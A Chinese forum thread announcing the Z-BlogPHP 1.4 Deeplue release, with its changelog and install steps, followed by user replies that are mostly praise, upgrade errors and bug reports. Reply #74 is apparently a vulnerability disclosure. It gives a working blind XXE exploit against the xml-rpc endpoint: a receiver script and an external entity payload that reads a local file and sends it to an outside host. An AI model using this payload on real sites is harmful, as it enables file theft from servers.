Z-BlogPHP 1.4 Deeplue Build 150101更新版!!! Z-BlogPHP

管理员 未寒 2015-1-31 207961

我们很高兴在2015农历春节前发布Z-BlogPHP 1.4 Deeplue ,这一版本包含了众多核心优化,给众多博主提供完善体验。
在接下来,我们会围绕Z-Blog/Z-BlogPHP周边,做些整合与尝试,希望大家支持!

更新说明:
新增:
支持相对大的数据库
支持PDO_SQLite
增加非固定域名的跳转
支持多语言安装,加入英语语言包
应用中心导出支持gzip压缩(gzba)
#5: 增加分类和Tags编辑【摘要】功能
修改:
对后台进行了大量修改
大量效率上的优化
语言包修改
c_option.php内容精简
后台引用的jQuery UI 升至 v1.11.1
检测到没有GD时自动关闭验证码
针对标题的引号等进行了入库时的转义
进入后台不再刷新统计信息
改进置顶功能
c_html_js_add加入ETag以缓存
修复:
解决在某些情况下进入404但不退出程序的问题
修正ob_flush()之后仍然设置header的问题
修复在某些情况下数据库关闭错误的问题
修复评论名与现有用户名重复不提示问题
解决一处反射型XSS安全漏洞
修正数处拼写错误
#3:当类型为double|float|data|time|datetime|timestamp时建表语句组装错误的BUG
#9:解决safe mode问题
#14:解决模板注释不起作用问题
#18:xml-rpc仅发布标题

针对开发者:
增加Config类
数据库查询类增加Group By等操作
加入posttype自定义文章好页面类型
$zbp增加LoadAppLanguage方法用于读取应用的语言包
$zbp增加HasConfig方法用于判断配置是否存在
$zbp→GetList改名为GetListType
$zbp→GetMemberByName读取时不区分大小写;
#12:$Member增加IsGod属性
$Base增加toString方法用于输出JSON;
$app类禁止打包以.开头的隐藏文件夹
$app类导出时自动处理BOM头
数据类增加了type属性
对DEBUG机制进行了大量的调整
Filter_Plugin_Debug_Shutdown_Handler接口改为Filter_Plugin_Debug_Handler
新增数个接口
注册Post类型


安装说明:


  • Z-BlogPHP需要PHP 5.2及以上版本的PHP环境。

  • 支持IIS、Apache、Lighttpd、Nginx、Kangle等Web服务器(本说明经针对普通服务器)。

  • 上传Z-BlogPHP。

  • 打开http://你的网站/。

  • 同意Z-Blog许可协议。

  • 建立数据库




    • Z-BlogPHP支持MySQL以及SQLite数据库。具体您该使用哪一种需要参考空间配置。

    • 一般情况下选择MySQL数据库,输入空间商为您提供的MySQL帐号密码。

    • 或是使用单数据库的SQLite,程序将自动创建。


  • 输入你为站点设置的管理员帐号密码。

  • 安装成功,进入网站。

  • 安装完成后请删除zb_install文件夹。

程序升级:
打开“应用中心”插件,点击子导航栏的“系统更新与校验”,按提示进行升级或者效验系统文件进行更新。

程序下载:


附件: 22345



未寒博客

最新回复 (359)
全部楼主
  • 超级版主 流年 2015-1-31 0
    引用 2
    本帖最后由 流年 于 2015-1-31 22:22 编辑

    额~ 为啥回复没了?

    承接各种模板、插件定制开发! https://www.huisem.com zblog非官方互助交流群:579908025

  • 应用开发者 橙色阳光 2015-1-31 0
    引用 3
    火速占领前排!支持!
  • 管理员 zx.asd 2015-1-31 0
    引用 4
    路过!!!

    短信已禁用,有事发贴。

  • 管理员 zsx 2015-1-31 0
    引用 5
    能打丫吗


    不理世事

  • 管理员 未寒 2015-1-31 0
    引用 6
    好顶赞!

    未寒博客

  • 超级版主 流年 2015-1-31 0
    引用 7
    本帖最后由 流年 于 2015-1-31 22:22 编辑

    再来一发~~~

    承接各种模板、插件定制开发! https://www.huisem.com zblog非官方互助交流群:579908025

  • 管理员 washun 2015-1-31 0
    引用 8
    来了!!!!

    申请应用中心开发者

  • 应用开发者 橙色阳光 2015-1-31 0
    引用 9
    ZBP主题定制,就找橙色阳光~~~
  • 超级版主 烽烟无限 2015-1-31 0
    引用 10
    强烈支持!!!前排占位!!!

    烽烟工作室:ZBlog主题定制   建站技术交流群 :99464245

  • 用户 qwa1234 2015-1-31 0
    引用 11
    看看看看,,,,,,,,,,,,,,,
  • 用户 goofy543 2015-1-31 0
    引用 12
    😁 太牛掰了 强烈支持1!!
  • 待验证用户 nobird 2015-1-31 0
    引用 13
    来晚了。。。。居然趁着我不在发新版!
  • 待验证用户 nobird 2015-1-31 0
    引用 14
    来晚了。。。。居然趁着我不在发新版!
  • 用户 画风 2015-1-31 0
    引用 15
    😊前排露个脸
  • 用户 qwa1234 2015-1-31 0
    引用 16
    更新不了,,怎么办,
    浏览在线应用,和检查应用更新的内容都是乱码
  • 应用开发者 897698882 2015-1-31 0
    引用 17
    人好多啊 ,终于升级了
  • 应用开发者 美好的生活 2015-1-31 0
    引用 18
    我来晚了。支持下!!!😁
  • 用户 aabababababa 2015-1-31 0
    引用 19
    升级出错?
    什么情况,后台都打不开了。。。

    (4096)E_RECOVERABLE_ERROR : Method Config::__toString() must return a string value (set_error_handler) (150101) (WINNT; IIS7.5; PHP 5.5.7; sqlite3; curl)
  • 超级版主 天兴工作室 2015-1-31 0
    引用 20
    来晚了 :'(

    天兴工作室 zblog模板主题定制

  • 超级版主 沉冰浮水 2015-1-31 0
    引用 21
    纠结。。。

    「QQ群:我的咸鱼心」「「水坑」系列教程索引
    我大概率能够解决你实际面临的问题(收费),只是”你提出的问题“要如何回答则可能是另一个问题。

  • 用户 Jcak 2015-1-31 0
    引用 22
    终于发布了!!
  • 应用开发者 lenton 2015-1-31 0
    引用 23
    什么时候发的。来太晚了。
  • 用户 lovetimi 2015-1-31 0
    引用 24
    年底就发布了
  • 用户 yangyixuan 2015-1-31 0
    引用 25
    等了好久了
  • 用户 ttzhk 2015-1-31 0
    引用 26
    强烈支持,已经完美升级至最新版。


    美熙美妆(www.ttzhk.com),全球最具权威最专业的化妆美妆养护分享网站,你身边的美丽导师~生命不息,美丽不止,上美熙美妆,享美丽人生!更多精彩分享,请访问美熙美妆官网~
  • 用户 xindao 2015-2-1 0
    引用 27
    终于出来了,怎么没有升级教程?》
  • 用户 mengqy 2015-2-1 0
    引用 28
    强烈支持!只不过第一页都上不去了……打个广告。傲孤漠客博客www.imoke.org求高质量原创友联
  • 用户 eDonic 2015-2-1 0
    引用 29
    ASP 版的路过 😔
  • 用户 Yedward 2015-2-1 0
    引用 30
    nice,几个我需要的功能这次都修复了,支持zbp,过几天找个时间升级下。
  • 待验证用户 沉默 2015-2-1 0
    引用 31
    我有奖励吗?
  • 用户 慕枫流云 2015-2-1 0
    引用 32
    终于我是又要回到zbp的怀抱啦!😊
    可惜安装成功后进后台报错,还在解决中!:'(
  • 用户 dpmore 2015-2-1 0
    引用 33
    换空间了 准备把asp的换成php的了
  • 用户 s1ihome 2015-2-2 0
    引用 34
    核心文件如果自己改动了的怎么办呢
  • 用户 鱼小千 2015-2-2 0
    引用 35
    不知道bug在哪里提。。

    有个小问题,我自己虚拟机里的lnmp环境,nginx+php都是最新版本,在获取$_SERVER时,里面的HTTPS为空,那么:

    zb_system/function/c_system_common.php 文件里的GetCurrentHost函数获取http时就会有问题。。

    if ($_SERVER['HTTPS'] == 'off') {

    $host = 'http://';

    } else {

    $host = 'https://';

    }

    请修改一下吧😁
  • 用户 深蓝 2015-2-2 0
    引用 36
    来晚了,顶一个
  • 超级版主 尔今 2015-2-3 0
    引用 37
    决定要用ZBLOG了✌

    这家伙最近作品?需要定制/解决问题,试试QQ交谈Z-BlogPHP常见问题教程

  • 用户 春秋 2015-2-3 0
    引用 38
    强烈支持,支持!可算更新了🤗🤗🤗🤗🤗
  • 用户 zhangyl 2015-2-3 0
    引用 39
    支持支持。
  • 用户 刘工 2015-2-3 0
    引用 40
    Zblog团队辛苦了,😊
  • 应用开发者 machealx 2015-2-3 0
    引用 41
    终于发布啦。。。。。。。有时间再试试吧。。。
  • 用户 咫尺天涯 2015-2-4 0
    引用 42
    为何有的主题置顶文章的缩略图无法显示呢!这是不是个BUG呢!
    www.huangyonghong.com
  • 管理员 小飞龙 2015-2-4 0
    引用 43
    貌似来晚了错过热闹了😁

    跨境指南Trade B2B招友情链接,网站内容要求:国际贸易、跨境电商

  • 用户 吴晓阳 2015-2-4 0
    引用 44
    支持呵呵好久等到更新了
  • 用户 mwp5215485 2015-2-6 0
    引用 45
    是贷款就是的实力的开始了肯定是
  • 用户 田田 2015-2-7 0
    引用 46
    下载不了啊,下别的东西都是3M/S 这个怎么都下不了
  • 用户 张国荣。 2015-2-9 0
    引用 47
    升级了。。。。。。。。
  • 应用开发者 feihuan 2015-2-10 0
    引用 48
    🤭 下来用一下 支持zblog
  • 用户 qq895075804 2015-2-12 0
    引用 49
    有漏洞!正常输入密码不会显示 密码输错 就这样显示 我还以为是我的问题呢 换了几台主机都一样
  • 用户 风吹雪 2015-2-13 0
    引用 50
    qq895075804 发表于 2015-2-12 17:33
    有漏洞!正常输入密码不会显示 密码输错 就这样显示 我还以为是我的问题呢 换了几台主机都一样


    同样的问题。。。
  • 用户 xjw112com 2015-2-14 0
    引用 51
    强烈支持http://www.xjw112.com/
  • 用户 cdb9 2015-2-14 0
    引用 52
    支持一下😊
  • 用户 暴博客 2015-2-15 0
    引用 53
    前排没了...
  • 用户 yien 2015-2-16 0
    引用 54
    强烈支持1!!
  • 用户 yonglichina 2015-2-25 0
    引用 55
    立即升级。刚发现。
  • 待验证用户 霍小保 2015-3-13 0
    引用 56
    强烈支持!!!
  • 用户 ymwl 2015-4-20 0
    引用 57
    默默的支持着!
  • 用户 站岸上的鱼儿 2015-5-2 0
    引用 58
    (4)E_PARSE : syntax error, unexpected T_STRING (register_shutdown_function) (150101) (Linux; Apache; PHP 5.3.23; sqlite; curl)
  • 用户 骑着毛驴去流浪 2015-5-4 0
    引用 59
    为什么我下载的 Z-BlogPHP_1_4_Deeplue_150101.zip这个版本上传到空间怎么是打不开的呢
  • 用户 kunk 2015-5-6 0
    引用 60
    稳定了,今天来转换php。。。
  • 用户 qdeteng 2015-5-13 0
    引用 61
    index header模板改变了,后台点 [清空缓存并重新编译模板] 没反应
  • 用户 heqi8826 2015-5-16 0
    引用 62
    如果不擅长install文件夹会怎样啊 我发现很多人没有这个习惯
  • 用户 七月来了 2015-5-20 0
    引用 63
    求救!!!Z-blog PHP安装出现这个错误了。。。怎么破?

    错误信息

    (2)E_WARNING : mysql_query() expects parameter 2 to be resource, boolean given (set_error_handler) (150101) (WINNT; Apache2.2.21; PHP 5.3.10; mysql; fsockopen)
  • 用户 adam2015 2015-5-25 0
    引用 64
    功能很强大,我很喜欢
  • 用户 liuchengjin 2015-5-30 0
    引用 65
    好长时间没来了,🤭
  • 用户 撸友厅 2015-6-7 0
    引用 66
    很喜欢这个程序。
  • 用户 乾达婆 2015-6-10 0
    引用 67
    顶一个 赞 继续 学习 学习啊
  • 用户 244521509 2015-6-27 0
    引用 68
    不错不错。。。太牛掰
  • 用户 千木工作室 2015-6-29 0
    引用 69
    😉:loveliness:
  • 用户 千木工作室 2015-7-4 0
    引用 70
    不错
    支持z-blog
  • 用户 chinaqingdao 2015-7-15 0
    引用 71
    用的人多吗?
  • 用户 zhou11 2015-7-29 0
    引用 72
    后台打开了,账号密码输入进不去,,登陆失败什么情况,大神指点一下。
    错误信息

    (0)UNKNOWN : 登录失败 (set_exception_handler) (150101) (Linux; nginx1.8.0; PHP 5.4.41; mysql; curl)
  • 用户 HiPHP 2015-8-17 0
    引用 73
    支持一下,刚从其他cms转过来。
  • 用户 xiaofengfeng 2015-8-20 0
    引用 74
    本帖最后由 xiaofengfeng 于 2015-8-20 09:29 编辑

    [p=25, null, left]@未寒[/p][p=25, null, left]/zb_system/xml-rpc/index.php 641行:

    [/p]code 区域$zbp->Load();

    Add_Filter_Plugin('Filter_Plugin_Zbp_ShowError','RespondError');

    $xmlstring = file_get_contents( 'php://input' );
    //Logs($xmlstring);
    $xml = simplexml_load_string($xmlstring);[p=25, null, left]

    可见,这里直接调用simple_load_string解析XML,造成了一个XML实体注入。

    但观察后面的代码发现,需要用户、密码才能执行一些操作,得到回显,否则会报错。

    没有回显的情况下,我们怎么来利用XXE,这里就说到一个blind xxe,在这篇文章都有详细的说明:

    http://www.7ftx.xyz /web-security/%E5%85%B3%E4%BA%8Eblind-xxe.html

    所以原理什么的我就不细说了,实际上我也是一知半解。主要看利用方法。



    先在我主机上放一个接收文件的php(http://www.7ftx.xyz /xxe/get.php):

    [/p]code 区域<?php
    file_put_contents('01.txt', $_GET['xxe_local']);
    ?>[p=25, null, left]

    目的是将$_GET['xxe_local']存入本地文件01.txt。然后再构造一个xml,也保存在我的主机上,这个XML实际上就是真正读取文件的XML:

    [/p]code 区域<!ENTITY % payload SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/windows/win.ini">
    <!ENTITY % int "<!ENTITY % trick SYSTEM 'http://www.7ftx.xyz/xxe/get.php?xxe_local=%payload;'>">
    %int;
    %trick;[p=25, null, left]

    我们看到这个XML,他引用了外部实体c:/windows/win.ini作为payload的值,然后又将payload拼接到 http://www.7ftx.xyz/xxe/get.php?xxe_local=%payload;,进行HTTP请求。
    [/p][p=25, null, left]
    接收到请求的get.php就将这个文件内容保存到01.txt了,形成了一个文件读取的过程。

    然后,我们向/zb_system/xml-rpc/index.php发包,让它来加载上面这个XML:

    [/p][p=25, null, left]http://static.wooyun.org/wooyun/upload/201502/2716493733b2bf9**1d89b9b946e744dca0294f.png[/p][p=25, null, left]

    发包过去后,就会请求我们的evil_php.xml,解析这个xml造成XXE攻击,读取c:/windows/win.ini并进行base64编码后传给get.php,最后保存在我们的主机上:

    [/p][p=25, null, left]http://static.wooyun.org/wooyun/upload/201502/27165057e88e4d00d003c06bc7df88bac837eee6.png[/p]
    [p=25, null, left]http://static.wooyun.org/wooyun/upload/201502/271652112c95ad7e1f19f2c63e486e310a9cda00.png[/p][p=25, null, left]



    用Blind XXE造成一个任意文件读取漏洞。
    [/p]

    漏洞证明:
    [p=25, null, left]http://static.wooyun.org/wooyun/upload/201502/27165057e88e4d00d003c06bc7df88bac837eee6.png[/p]
    [p=25, null, left]http://static.wooyun.org/wooyun/upload/201502/271652112c95ad7e1f19f2c63e486e310a9cda00.png[/p]


  • 用户 毛大混子 2015-8-29 0
    引用 75
    expecting T_CONSTANT_ENCAPSED_STRING or '(' (register_shutdown_function) (150101) (Linux; Apache; PHP 5.2.17; mysqli; curl) 怎么解决 后台首页都打不开了
  • 用户 zwzry 2015-9-2 0
    引用 76
    php版试一下安装,看看效果
  • 用户 Howitworks 2015-9-6 0
    引用 77
    本帖最后由 Howitworks 于 2015-9-7 11:28 编辑

    文章置顶后,在分类下不显示该文章,是bug吗?
  • 用户 w18cm 2015-9-8 0
    引用 78
    😁😁太牛掰了 强烈支持1
  • 用户 heavan 2015-9-19 0
    引用 79
    关键词和网站描述没有地方修改啊
  • 用户 loveme10086 2015-10-2 0
    引用 80
    😁😁😁回复也是一种美德。
  • 用户 蒋炳楠 2015-10-3 0
    引用 81
    数据变迁,更新尝鲜。-蒋炳楠博客
  • 用户 蒋炳楠 2015-10-3 0
    引用 82
    蒋炳楠:本来使用的是z-blog,asp版本可是最后发现其实PHP才是较为盛行的版本,更易于优化,与百度即众多搜索引擎更为友好。
  • 用户 muxu332 2015-10-7 0
    引用 83
    支持!!!
  • 用户 huolarry 2015-10-8 0
    引用 84
    太牛了。支持zblog
  • 用户 vaman 2015-10-26 0
    引用 85
    来看看
  • 用户 聚来宝灵犀 2015-12-22 0
    引用 86
    用了两年asp版本的,还是该换成php版本的了。😁
  • 用户 ghostsun 2015-12-30 0
    引用 87
    .. 此帖意义何在?
  • 用户 web 2016-1-3 0
    引用 88
    我好下载了!!!!!!!都别动,都别动!!!!!!
  • 用户 dewfn 2016-1-4 0
    引用 89
    😊转到最后一页
  • 待验证用户 淡然的禽兽 2016-1-4 0
    引用 90
    看看 嘿嘿嘿
  • 用户 backy16989 2016-1-5 0
    引用 91
    额~ 为啥回复没了?
  • 用户 chaonixunlei 2016-1-5 0
    引用 92
    以前用ASP版本的 现在改为php
  • 用户 chaonixunlei 2016-1-5 0
    引用 93
    流年 发表于 2015-1-31 15:45
    额~ 为啥回复没了?


    为什么不能下载啊
  • 应用开发者 七片枫叶 2016-1-6 0
    引用 94
    期待新版本呀
  • 用户 亻十丿厶 2016-1-9 0
    引用 95
    Z-BlogPHP 1.4 Deeplue Build 150101更新版
  • 用户 kbsonlong 2016-1-9 0
    引用 96
    🤝🤝🤝🤝🤝
  • 用户 fatelinegod 2016-1-14 0
    引用 97
    安装 第四步报错
    (2)E_WARNING : mysqli_query() expects parameter 1 to be mysqli, boolean given (set_error_handler) (150101) (Darwin; Apache2.4.16; PHP 5.6.12; mysqli; curl)
  • 应用开发者 slinbo 2016-1-15 0
    引用 98
    😊😊😊😊😊😊😊😊
  • 用户 lulimin2008 2016-1-17 0
    引用 99
    怎么使用啊?
  • 用户 太天真 2016-1-17 0
    引用 100
    哈哈哈😁
    • ZBlogger技术交流中心
      361
          
返回